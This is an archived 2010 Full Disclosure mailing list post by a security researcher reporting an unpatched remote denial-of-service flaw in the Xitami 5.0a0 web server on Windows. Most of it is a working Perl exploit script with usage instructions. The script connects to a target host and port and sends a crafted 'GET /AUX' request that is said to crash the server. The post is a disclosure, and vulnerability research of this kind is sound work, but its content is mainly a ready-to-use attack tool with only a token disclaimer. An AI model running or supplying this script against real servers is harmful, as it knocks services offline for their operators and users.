Full Disclosure mailing list archives
Xitami-5.0a0-windows DOS
From: Usman Saeed <usman () xc0re net>
Date: Mon, 10 May 2010 14:13:39 +0500
########################################################################################### # # Name : Xitami/5.0a0 Denial Of Service # Author: Usman Saeed # Company: Xc0re Security Research Group # Website: http://www.xc0re.net # DATE: 10/05/10 # Tested on Windows 7 ! ########################################################################################### Disclaimer: [This code is for Educational Purposes , I would Not be responsible for any misuse of this code] [*] Download Page :http://www.xitami.com [*] Attack type : Remote [*] Patch Status : Unpatched [*] Description : By sending a crafted GET request [GET /AUX HTTP/1.1] to the server , the server crashes ! [*] Exploitation : #!/usr/bin/perl # Xitami/5.0a0 Denial Of Service # Disclaimer: # [This code is for Educational Purposes , I would Not be responsible for any misuse of this code] # Author: Usman Saeed # Company: Xc0re Security Research Group # Website:http://www.xc0re.net # DATE: [25/10/09] $host = $ARGV[0]; $PORT = $ARGV[1]; $packet = "AUX"; $stuff = "GET /".$packet." HTTP/1.0\r\n\r\n"; use IO::Socket::INET; if (! defined $ARGV[0]) { print "+========================================================+\n"; print "+ Program [Xitami/5.0a0 Denial Of Service] +\n"; print "+ Author [Usman Saeed] +\n"; print "+ Company [Xc0re Security Research Group] +\n"; print "+ DATE: [10/05/10] +\n"; print "+ Usage :perl sploit.pl webserversip wbsvrport +\n"; print "+ Disclaimer: [This code is for Educational Purposes , +\n"; print "+ I would Not be responsible for any misuse of this code]+\n"; print "+========================================================+\n"; exit; } $sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr => $host , PeerPort => $PORT) || die "Cant connect to $host!"; print "+========================================================+\n"; print "+ Program [Xitami/5.0a0 Denial Of Service] +\n"; print "+ Author [Usman Saeed] +\n"; print "+ Company [Xc0re Security Research Group] +\n"; print "+ DATE: [10/05/10] +\n"; print "+ Usage :perl sploit.pl webserversip wbsvrport +\n"; print "+ Disclaimer: [This code is for Educational Purposes , +\n"; print "+ I would Not be responsible for any misuse of this code]+\n"; print "+========================================================+\n"; print "\n"; print "[*] Initializing\n"; sleep(2); print "[*] Sendin DOS Packet \n"; send ($sock , $stuff , 0); print "[*] Crashed:) \n"; $res = recv($sock,$response,1024,0); print $response; exit; _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- xitami-5.0a0-windows DOS usman (May 10)
- <Possible follow-ups>
- Xitami-5.0a0-windows DOS Usman Saeed (May 10)